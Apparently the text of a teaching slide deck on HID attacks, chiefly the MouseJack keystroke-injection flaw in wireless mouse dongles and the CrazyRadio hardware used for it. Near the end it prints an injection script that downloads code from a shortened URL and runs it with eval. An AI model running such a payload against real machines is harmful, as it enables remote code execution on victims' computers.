HID Attack
Cesena Security Network and Application
Human Interface Device
A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.
The term "HID" most commonly refers to the USB-HID specification.
The term was coined by Mike Van Flandern of Microsoft when he proposed that the USB committee create a Human Input Device class working group.
HID Attack
Rubber Ducky
Bash Bunny
MouseJack
Vulnerabilities affecting non-Bluetooth wireless mice and keyboard discovered by Marc Newlin by Bastille Threat Research Team.
https://www.bastille.net/
https://www.mousejack.com/
This kind of vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using an USB dongle.
Why
Wireless mice and keyboards cumminicate using a proprietary standard protocols operating in the 2.4GHz ISM band (Industrial, Scientific, Medical):
there is no standard to follow
Each vendor can implement his own security scheme.
Why
In order to prevent eavesdropping, most vendor encrypt the data being transmitted by the keyboard. The dongle has the encryption key used by the keyboard so is able to decrypt the data and send the payload to the computer.
Without knowing the encryption key, an attacker is unable to decrypt the data, so the are unable to see what is being typed.
but....
MouseJack
Some mice tested by the Bastille team do not implement this kind of encryption: this mean that there is no authentication mechanism and the dongle is unable to distinguish between packets transmitted by a mouse and those transmitted by an attacker researcher.
Not very usefull to just press a mouse button...
MouseJack
Researcher discovered that the dongles can also process specially crafted packets which generate keypresses instead of mouse movement/clicks.
MouseJack
- keystroke injection, spoofing a mouse
- keystroke injection, spoofing a keyboard
- forced pair
How
Researcher discovered that the dongles can also process specially crafted packets which generate keypresses instead of mouse movement/clicks.
The nRF24L dongles for 2.4GHz devices support multiple data rates, address length, packets formats and checksums in spite of SDR devices which resulted slower, less configurable and harder to observe all the transmitted packets: when a mouse transmits a packet to a dongle, the dongles replies with an ACK packet whithin 250 microseconds.
How
CrazyRadio PA by bitcraze is an opensource device with an amplified nRF24L-based USB dongle: equivalent to an amplified version of the common USB dongle for mice and keyboards.
- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface
30 € su Amazon......
Attack
Attack
Real Attack
- choose victim
- gather informations
- write expliot
- profit
Real Attack
- choose victim with a possibile unpatched/vulnerable device
Real Attack
- gather informations about OS, keybinding, instelled tools, etc
Real Attack
- write exploit
DELAY 1000
GUI-SHIFT ENTER
DELAY 800
STRING (x=$(\curl -sL http://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER
- JackIt
https://github.com/insecurityofthings/jackit
Source
HID Attack
By Edoardo Rosa
